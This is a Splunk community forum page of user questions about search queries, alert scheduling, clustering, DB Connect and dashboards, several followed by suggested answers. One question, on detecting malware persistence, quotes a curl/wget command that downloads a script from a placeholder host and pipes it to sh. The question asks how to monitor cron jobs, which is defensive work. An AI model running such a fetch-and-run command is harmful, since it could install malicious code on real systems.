All Topics

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

Hi all, I have two indexes that share a common field, and I want to join them together.

Query 1:

index=opennms "uei.opennms.org/nodes/nodeUp" OR "uei.opennms.org/nodes/nodeDown"
| rex field=eventuei "uei.opennms.org/nodes/node(?<Status>.+)"
| stats max(_time) as Time latest(Status) as Status by nodelabel
| table nodelabel, Status, Time

Query 2:

index=itsm sourcetype=remedy_midtier
| rename _time as Time
| fieldformat Time=strftime(Time,"%Y-%m-%d %l:%M:%S %p")
| table nodelabel, Incident_Number, Time

Output table 1:

nodelabel  Status  Time
CASCO      Up      2020-08-07 5:45:28 PM
AERIB      Up      2020-08-07 5:30:05 PM
CNPYU      Up      2020-08-07 5:34:41 PM

Output table 2:

nodelabel  Incident_Number  Status  Time
CASCO      INC000013850038          2020-08-07 5:45:28 PM
CNPTT      INC000013850032          2020-08-07 5:34:42 PM
CNPYU      INC000013850032          2020-08-07 5:34:41 PM

Expected output:

nodelabel  Incident_Number  Status  Time
CASCO      INC000013850038  UP      2020-08-07 5:45:28 PM
CNPTT      INC000013850032          2020-08-07 5:34:42 PM
CNPYU      INC000013850032  UP      2020-08-07 5:34:41 PM

I used the join command with an inner join, but it failed. Please help me with the join; nodelabel should be the common field.
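Not a definitive answer, but one common join-free pattern (sketched from the two queries above — field names come from the post, while the aggregation choices are assumptions) is to append the second search and merge everything with stats by nodelabel:

```spl
index=opennms "uei.opennms.org/nodes/nodeUp" OR "uei.opennms.org/nodes/nodeDown"
| rex field=eventuei "uei.opennms.org/nodes/node(?<Status>.+)"
| append
    [ search index=itsm sourcetype=remedy_midtier
      | fields nodelabel Incident_Number _time ]
| stats max(_time) as Time latest(Status) as Status latest(Incident_Number) as Incident_Number by nodelabel
| fieldformat Time=strftime(Time, "%Y-%m-%d %l:%M:%S %p")
| table nodelabel, Incident_Number, Status, Time
```

The stats-based merge avoids join's subsearch limits, and nodes with no matching incident (or no status) simply get an empty cell, which matches the expected output above.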
I found this expression (30/5 2-4 * * *) to schedule an alert from 2:30 AM to 4 AM, running every 5 minutes: https://crontab.guru/#30/5_2-4_*_*_* But it is not working in Splunk Cloud, and I get the error below. Could someone please suggest an alternate expression that will work in Splunk Cloud?
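Not verified against Splunk Cloud's validator, but its cron parser is often stricter than crontab.guru about a step applied to a bare start value like 30/5. Assuming the standard range-with-step form (30-59/5) is accepted, one workaround is to split the window across two scheduled copies of the alert:

```
# Copy 1 of the alert: 2:30–2:55 AM, every 5 minutes
30-59/5 2 * * *

# Copy 2 of the alert: 3:00–3:55 AM, every 5 minutes
# (add a third schedule "0 4 * * *" if a run at exactly 4:00 AM is needed)
*/5 3 * * *
```

A single standard cron expression cannot express "2:30 to 4:00 every 5 minutes" exactly, because the minute list differs between the 2 o'clock hour and the 3 o'clock hour.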
Hello everyone. We had to change the IP of our entire cluster; after the change, one SH member is not able to communicate with the master. This member was the captain before the change. I tried to connect it to the new SH cluster, but without success. The only error in splunkd.log was:

ERROR KVStorageProvider - An error occurred during the last operation ('saveBatchData:upsert', domain: '0', code: '0'): No collection available

I executed ./splunk clean kvstore, and after that the main error in the logs is:

INFO AuthenticationManagerLDAP - Could not find user=admin

The SH which is now the captain didn't have any issues and has the corresponding configuration. Do you have any suggestions for solving this issue?
Hi Team, I have a search head cluster of 12 nodes, and I want to create an alert if the time gap of "last_conf_replication" is more than one hour. Can you please advise?
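As a starting point only — the REST endpoint, the exact field name, and the timestamp format of last_conf_replication below are assumptions, so check them against the raw output of the endpoint on your captain before relying on this:

```spl
| rest /services/shcluster/captain/members
| eval repl_time = strptime(last_conf_replication, "%a %b %d %H:%M:%S %Y")
| eval gap_seconds = now() - repl_time
| where gap_seconds > 3600
| table label, last_conf_replication, gap_seconds
```

Saved as an alert that triggers when the number of results is greater than 0, each result would name a member whose last configuration replication is over an hour old.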
Please share a step-by-step process if you have one.
I've just been reviewing the Firewalls dashboard in the Continuous Monitoring section of the InfoSec app. The search that powers the External Source and Destination IP counts is this:

| tstats summariesonly=true allow_old_summaries=true dc(All_Traffic.src_ip) from datamodel=Network_Traffic where All_Traffic.src_ip!=10.0.0.0/8 All_Traffic.src_ip!=192.168.0.0/16 All_Traffic.src_ip!=172.16.0.0/12

If I change dc(All_Traffic.src_ip) to values(All_Traffic.src_ip), the list of IPs generated includes all our 10.0.0.0/8 addresses. I've seen this problem with other tstats network searches I've tried to run and thought I wasn't formatting the search properly, but there's clearly an issue with the All_Traffic.src_ip!=10.0.0.0/8 filter. Has anyone else seen this or got a solution? Thanks
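An untested suggestion: != combined with CIDR notation is a known rough edge in tstats where clauses, and rewriting the exclusion as NOT with positive = matches sometimes behaves differently, so it may be worth trying:

```spl
| tstats summariesonly=true allow_old_summaries=true dc(All_Traffic.src_ip)
    from datamodel=Network_Traffic
    where NOT (All_Traffic.src_ip=10.0.0.0/8 OR All_Traffic.src_ip=192.168.0.0/16 OR All_Traffic.src_ip=172.16.0.0/12)
```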
Hello, Splunk DB Connect returned events containing SQL queries, which need to be sent in an alert email to users from Splunk Cloud. The complete SQL query appears in the events, but when we receive them as an alert, the queries are truncated. Is there any way to get the alerts with the SQL queries untruncated? Is there a limit on the number of characters per field sent in an alert email? Thank you
Hello, I have a search string like the one below, which fetches data from a stage and gives aggregates of trades for each source system in that stage.

index=qrp STAGE IN (TRADE_EVENT)
| bucket _time span=1h
| timechart useother=f span=1h sum(TRADES) as "TradeCount" by ODS_SRC_SYSTEM_CODE
| fillnull value=0

The results look like this:

TradeCount: A1   TradeCount: A2   TradeCount: A3
27               5                0

What should my condition be to trigger the alert action when sum(TRADES) for a source system is 0? For example, TradeCount: A3 has a value of zero now.
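One way to express that trigger (a sketch built on the search above): untable reshapes the single timechart row into one row per source system, so the alert can fire on any zero without naming the columns in advance:

```spl
index=qrp STAGE IN (TRADE_EVENT)
| timechart useother=f span=1h sum(TRADES) as TradeCount by ODS_SRC_SYSTEM_CODE
| fillnull value=0
| untable _time ODS_SRC_SYSTEM_CODE TradeCount
| where TradeCount = 0
```

Set the alert to trigger when the number of results is greater than 0; each result then identifies a source system with zero trades in that hour.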
Hi, I am trying to build a table that counts the different processes that occurred for a particular user in a 5-minute window before a crash. I need that to analyze user behavior and the reason behind the crash. I am using uberAgent data for this. I have a search that shows events before the crash; the challenge is to combine different users, with different 5-minute windows, into one table. My raw data has time and event columns, and I am looking for a way to introduce a time filter per user:

time      event               time filter
01:05     crash_event_user_1
01:04:59  event_user_1        include
01:04:58  event_user_1        include
01:04:42  event_user_1        include
01:04:31  event_user_1        include
01:02:30  event_user_1        include
01:01:25  event_user_1        include
12:59:25  event_user_1        exclude
12:58:25  event_user_1        exclude
01:03     crash_event_user_2
01:02:59  event_user_2        include
01:02:58  event_user_2        include
01:02:42  event_user_2        include
12:48:25  event_user_2        include
12:47:25  event_user_2        exclude
12:46:25  event_user_2        exclude

Which commands do you think could be useful in creating these searches? Is there a use, e.g., for streamstats in narrowing the 5-minute window? Might the window parameter help?
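A sketch of the streamstats idea (the index, user, and event field names below are assumptions based on the table above — real uberAgent field names will differ): sort each user's events newest-first, stamp each crash event with its time, let streamstats carry that time down the stream per user, and keep events within 300 seconds of it:

```spl
index=uberagent
| sort 0 user - _time
| eval crash_time = if(like(event, "crash_%"), _time, null())
| streamstats latest(crash_time) as last_crash by user
| where isnotnull(last_crash) AND _time < last_crash AND _time >= last_crash - 300
| stats count by user, event
```

Because streamstats ignores null values, latest(crash_time) effectively acts as a per-user filldown: every event inherits the time of the most recent crash above it, which gives each user their own 5-minute window.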
Hello, I need a restricted role that can only upload data files. I added these capabilities:

edit_monitor - required to make the "Add Data" option show up in the Settings menu.
indexes_edit - required to make the user's index name show up in the Indexes drop-down when uploading the file.
edit_tcp - required to get the file to actually upload. Without this capability the file upload would hang.
search - required so the user can preview the uploaded file.

But the Settings menu is still not visible. The goal is to create a limited-access account with only the right to upload data, nothing else. Is it possible? Thanks for your help. Splunk version 8.1
I am using Splunk DB Connect to collect data from a database. While configuring the connection, I set the timezone to Etc/GMT+1 : -01:00, since the log generation time in the database is GMT+1. When I searched the data and checked the time difference, I found a difference of 1 hour: _time is 1 hour ahead of indextime. FYI: the database is in GMT+1. What is the difference between Etc/GMT+1 : -01:00 and Etc/GMT-1 : +01:00? Thank you for any help!
Hi all, I'm trying to display a week-over-week percentage change of event counts collected for various countries, and display that percentage on a choropleth map. The time window is a rolling window of the past 7 days (including today) compared with the 7 days before that, so it is not always fixed to start on a Sunday. I also have to dedup fieldA and fieldB within each 7-day period, i.e. if fieldA=5, fieldB=6 appears twice in each of the two 7-day periods in the same country, the event should be counted once per period.

For example:

Country    LastWeek  ThisWeek  PercentChange
US         10        10        0
Japan      5         4         -20
Australia  4         5         25
China      2         0         -100
Canada     0         2         400

For the Canada case, I divide by 1 instead of 0 to calculate PercentChange, because I still want to show that there is a change in the number of events. I then display the percentage-change values on the map over the respective countries. The query I have is:

index=test earliest=-6d@d latest=now()
| bin _time span=7d
| dedup _time fieldA fieldB country
| stats count as ThisWeek by country
| append
    [ search index=test earliest=-13d@d latest=-6d@d
      | bin _time span=7d
      | dedup _time fieldA fieldB country
      | stats count as LastWeek by country ]
| stats values(*) as * by country
| eval LastWeek=if(isnotnull(LastWeek), LastWeek, 0)
| eval ThisWeek=if(isnotnull(ThisWeek), ThisWeek, 0)
| eval divideBy=if(LastWeek=0, 1, LastWeek)
| eval PercentChange=round((ThisWeek - LastWeek)/divideBy * 100, 2)
| stats values(PercentChange) as Percentage_Change by country
| geom geo_countries featureIdField=country

I'm getting the map to display the values; however, my query takes a long time to parse and run. Can I optimize it to make it run faster? Thank you!
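One possible optimization (a sketch, not tested on your data): the append forces a second full scan of the index, so computing both weeks in a single pass with an eval'd period label should roughly halve the work and also removes the extra stats passes:

```spl
index=test earliest=-13d@d latest=now()
| eval period = if(_time >= relative_time(now(), "-6d@d"), "ThisWeek", "LastWeek")
| dedup period fieldA fieldB country
| chart count over country by period
| fillnull value=0 LastWeek ThisWeek
| eval divideBy = if(LastWeek=0, 1, LastWeek)
| eval PercentChange = round((ThisWeek - LastWeek) / divideBy * 100, 2)
| geom geo_countries featureIdField=country
```

Here dedup on period replaces the bin _time span=7d plus dedup _time combination, since period already identifies which 7-day window an event belongs to.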
Hi, with the code below I display a pie chart showing the top 10 EventCodes:

index="toto" sourcetype=tutu EventCode=* (Level=1 OR Level=2 OR Level=3)
| fields _time host EventCode
| eval time = strftime(_time, "%m/%d/%Y %H:%M")
| stats count(host) as "Number of EventCode" by EventCode
| sort -"Number of EventCode"
| head 10

Now I need to open a drilldown when I click on a slice of the pie chart. I modified my XML like this, but it doesn't work:

<init>
  <set token="EventCode">*</set>
</init>
<drilldown>
  <set token="EventCode">$click.value$</set>
  <link target="_blank">/app/titi/eee</link>
</drilldown>

Could you help me please?
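A sketch of one common fix: tokens set with <set> live only on the current dashboard, so a <link> to another dashboard must carry the clicked value as a URL parameter. The form.EventCode name below is an assumption — it must match an input token defined on the target dashboard /app/titi/eee:

```xml
<drilldown>
  <set token="EventCode">$click.value$</set>
  <link target="_blank">/app/titi/eee?form.EventCode=$click.value$</link>
</drilldown>
```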
I have data in the following form:

field A   field B (this is an array)
a         {"k":1}
          {"k":2}
          {"k":3}
b         {"k":1}
          {"k":1}
          {"k":1}

field B is an array, and I want to produce a table like this:

field A   sumB
a         6
b         3

What is the way to extract the values and add them up? My thinking was to do

| eval value=spath(fieldB, "k")

and I was expecting value to hold the arrays 1,2,3 and 1,1,1, but it did not.
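A sketch, assuming fieldB holds a JSON array of objects like [{"k":1},{"k":2},{"k":3}]: the spath command with a {} array path pulls every k into one multivalue field, and stats then sums across all of its values per group:

```spl
| spath input=fieldB path={}.k output=k
| stats sum(k) as sumB by fieldA
```

The eval spath(fieldB, "k") form was looking for a top-level k key rather than walking the array; the {}.k path is what iterates over the array elements.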
When some Trojans or viruses are implanted in a Linux OS, they add a cron job to persist. For example:

curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx.com/raw/sByq0rym)|sh

So, can I use Splunk to monitor newly added cron jobs?
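Yes — one common approach (the paths below are typical Linux defaults and the index/sourcetype names are examples; adjust for your distribution and naming scheme) is to monitor the cron configuration files with a universal forwarder, then alert on new entries:

```
# inputs.conf on the Linux forwarder
[monitor:///etc/crontab]
index = os
sourcetype = cron_config

[monitor:///etc/cron.d]
index = os
sourcetype = cron_config

[monitor:///var/spool/cron]
index = os
sourcetype = cron_config
```

Monitoring /var/log/cron (where cron daemons typically log job edits and executions), or auditd watches on those paths, can complement this for richer detection.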
Hi, I am trying to connect an Azure Storage account with the Splunk Add-on for Microsoft Cloud Services, following the URL below: https://docs.splunk.com/Documentation/AddOns/released/MSCloudServices/Configureazurestorageaccount How can I check whether it is connected successfully? Regards, Rahul
Hello, I'm trying to analyze the results of an A/B test on access-pattern changes for a specific field. The simplified query looks like:

index=test-app (ab_test_id="baseline" OR ab_test_id="abc123")
| timechart count(eval(ab_test_id=="baseline")) as Baseline count(eval(ab_test_id=="abc123")) as Test by api_endpoint

Since the event counts differ by ~100x, it would be better to re-scale the data, either with min-max normalization as in the post below, or just as a percentage per API endpoint — e.g. api_xyz may account for 20% of requests in baseline but receive 50% in the A/B test (abc123). https://community.splunk.com/t5/Archive/Normalizing-feature-scaling-a-datapoint/td-p/194303

I used to have a concatenated field on the timechart, like:

index=test-app (ab_test_id="baseline" OR ab_test_id="abc123")
| eval endpoint_by_ab=mvzip(api_endpoint, ab_test_id, "_")
| timechart count by endpoint_by_ab
| addtotals row=true fieldname=_total_baseline *_baseline
| addtotals row=true fieldname=_total_ab *_abc123
| foreach *_baseline [eval <<FIELD>> = round('<<FIELD>>' * 100 / _total_baseline)]
| foreach *_abc123 [eval <<FIELD>> = round('<<FIELD>>' * 100 / _total_ab)]

It would be great to keep the original api_endpoint field so I can use the trellis layout to compare baseline with A/B for each api_endpoint. How should I do that? Thanks,
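One direction to try (an untested sketch): drop down from timechart to stats so api_endpoint and ab_test_id stay as separate fields, normalize with eventstats per test arm and time bucket, and then split the trellis on api_endpoint:

```spl
index=test-app (ab_test_id="baseline" OR ab_test_id="abc123")
| bin _time span=1h
| stats count by _time, api_endpoint, ab_test_id
| eventstats sum(count) as arm_total by _time, ab_test_id
| eval pct = round(count * 100 / arm_total, 1)
| table _time, api_endpoint, ab_test_id, pct
```

Depending on the chart type, a final xyseries/chart step may still be needed to plot pct by ab_test_id within each trellis panel.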
Hi. I have a DB output job constantly failing with the following error:

ERROR org.easybatch.core.job.BatchJob - Unable to read next record java.lang.RuntimeException: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[123123,23423] Message: The reference to entity "g" must end with the ';' delimiter. ...

I have tested multiple times with the same data set, but it fails with a ParseError in different positions and with different messages. My DB Connect is version 3.1.4, installed on Splunk version 7.2.5. Does anyone have any clues? Thanks.
Hi all, I have the situation below. The actual query is much longer, so I just need the logic. cve is a multivalue field, separated by commas: for every affected asset there is more than one CVE in each event. I need to separate the values on the comma delimiter first and then expand them. My issue is that mvexpand has a 500MB default limit; I have raised it to 10000MB, but this is neither ideal nor helping. I need an alternative to mvexpand. mvexpand also takes only one field to expand on, and I have one more mvexpand in my query, so I am looking for an alternative option. Please advise. Thanks in advance.

index=abc sourcetype="xyz"
`comment limiting fields to only what I need`
| fields dnsName, macAddress, state, description, vulnPubDate, firstSeen, lastSeen, hasBeenMitigated, port, seeAlso, xref, plugin_name, plugin_version, plugin_family, pluginInfo, pluginText, plugin_publication_date, plugin_modification_date, patch_publish_date, cvssV3Vector, plugin_id, cve, cvssV3BaseScore, ip, "repository.dataFormat"
`comment cve is a multivalue field separated by comma so I need them separated and expanded to get correct stats`
| makemv delim="," cve
| mvexpand cve
`comment this is where my streaming commands go below which is long`
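Not a universal replacement, but one mvexpand-free pattern worth testing: when a multivalue field appears in a stats by clause, the event is counted once per value, so the expansion happens inside stats without mvexpand's memory limit. The aggregations and by-fields below are examples — swap in the ones your real query needs:

```spl
index=abc sourcetype="xyz"
| fields dnsName, ip, lastSeen, cve
| makemv delim="," cve
| stats count latest(lastSeen) as lastSeen by cve, dnsName, ip
```

This only works when the rest of the pipeline can be expressed as aggregations; if later streaming commands truly need one event per CVE, consider narrowing the field list before mvexpand so each expanded event is as small as possible.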